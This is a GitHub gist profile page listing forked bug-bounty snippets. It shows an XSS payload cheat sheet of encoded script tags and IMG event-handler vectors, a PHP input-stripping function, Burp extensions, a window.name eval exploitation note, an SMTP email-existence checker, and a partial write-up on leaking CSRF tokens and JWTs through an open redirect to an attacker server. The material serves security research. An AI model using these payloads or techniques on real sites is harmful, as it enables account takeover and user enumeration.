Skip to content

Instantly share code, notes, and snippets.

View 0xcod3's full-sized avatar

0xcod3

1 follower · 1 following
View GitHub Profile
@0xcod3
0xcod3 / xss_vectors.txt
Created July 7, 2019 06:06 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@0xcod3
0xcod3 / CleanUserInput.php
Created July 7, 2019 06:02 — forked from kegonomics/CleanUserInput.php
PHP functions to clean user input.
<?php
function cleanInput($input) {
$search = array(
'@<script[^>]*?>.*?</script>@si', // Strip out javascript
'@<[\/\!]*?[^<>]*?>@si', // Strip out HTML tags
'@<style[^>]*?>.*?</style>@siU', // Strip style tags properly
'@<![\s\S]*?--[ \t\n\r]*>@' // Strip multi-line comments
);
@0xcod3
0xcod3 / highlight_in_scope.py
Created May 27, 2019 05:24 — forked from stefanocoding/highlight_in_scope.py
Burp Extension to highlight in the Proxy requests that are in scope
from burp import IBurpExtender
from burp import IProxyListener
class BurpExtender(IBurpExtender, IProxyListener):
def registerExtenderCallbacks(self, callbacks):
self.helpers = callbacks.getHelpers()
self.callbacks = callbacks
callbacks.setExtensionName('Highlight in scope')
callbacks.registerProxyListener(self)
@0xcod3
0xcod3 / copy_cookie_header.py
Created May 27, 2019 05:23 — forked from stefanocoding/copy_cookie_header.py
This Burp extension adds an item to the context menu - when right-clicking in the request in Proxy or Repeater - to copy the entire "Cookie" header without having to manually select it and press Ctrl+C. It's useful for me when updating session information of tabs in the Repeater for saved projects.
@0xcod3
0xcod3 / window.name.md
Created May 27, 2019 05:22 — forked from stefanocoding/window.name.md
When `window.name` is evaluated #xss

The following is not a bug in the web browsers - it's supposed to work this way - but is useful in some cases like the one described.

In one of the Javascript files loaded by an endpoint of a private program, they were taking the value of window.name and passing it to something like eval([here]) or setTimeout([here], [some_milliseconds]), I don't remember correctly... The thing is that the value of window.name was being evaluated as Javascript code, so window.name = 'alert()' showed an alert(). To use this behavior for an attack, you have two options:

  1. if the endpoint is frameable from any domain, you can create an <iframe name='[javascript_code_here]' src='[vulnerable_endpoint]'></iframe>
  2. if it's not frameable, you can set window.name = '[javascript_code_here]' in your own domain and then redirect to the vulnerable endpoint

The one I used was the second option. 💰

@0xcod3
0xcod3 / does_email_address_exist.py
Created May 27, 2019 05:21 — forked from stefanocoding/does_email_address_exist.py
Useful Python script to know if an email address exists, based on Inti's Medium post https://medium.com/intigriti/abusing-autoresponders-and-email-bounces-9b1995eb53c2
#!/usr/bin/python3
# Example usage: ./does_email_address_exist.py twitter.com jack
import argparse
from smtplib import SMTP
import dns.resolver
parser = argparse.ArgumentParser()
parser.add_argument('hostname')
parser.add_argument('user')
args = parser.parse_args()
@0xcod3
0xcod3 / csrf_jwt_redirect_leak.md
Created May 27, 2019 05:19 — forked from stefanocoding/csrf_jwt_redirect_leak.md

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user 
    GET /verify/VALUE HTTP/1.1
Host: example.com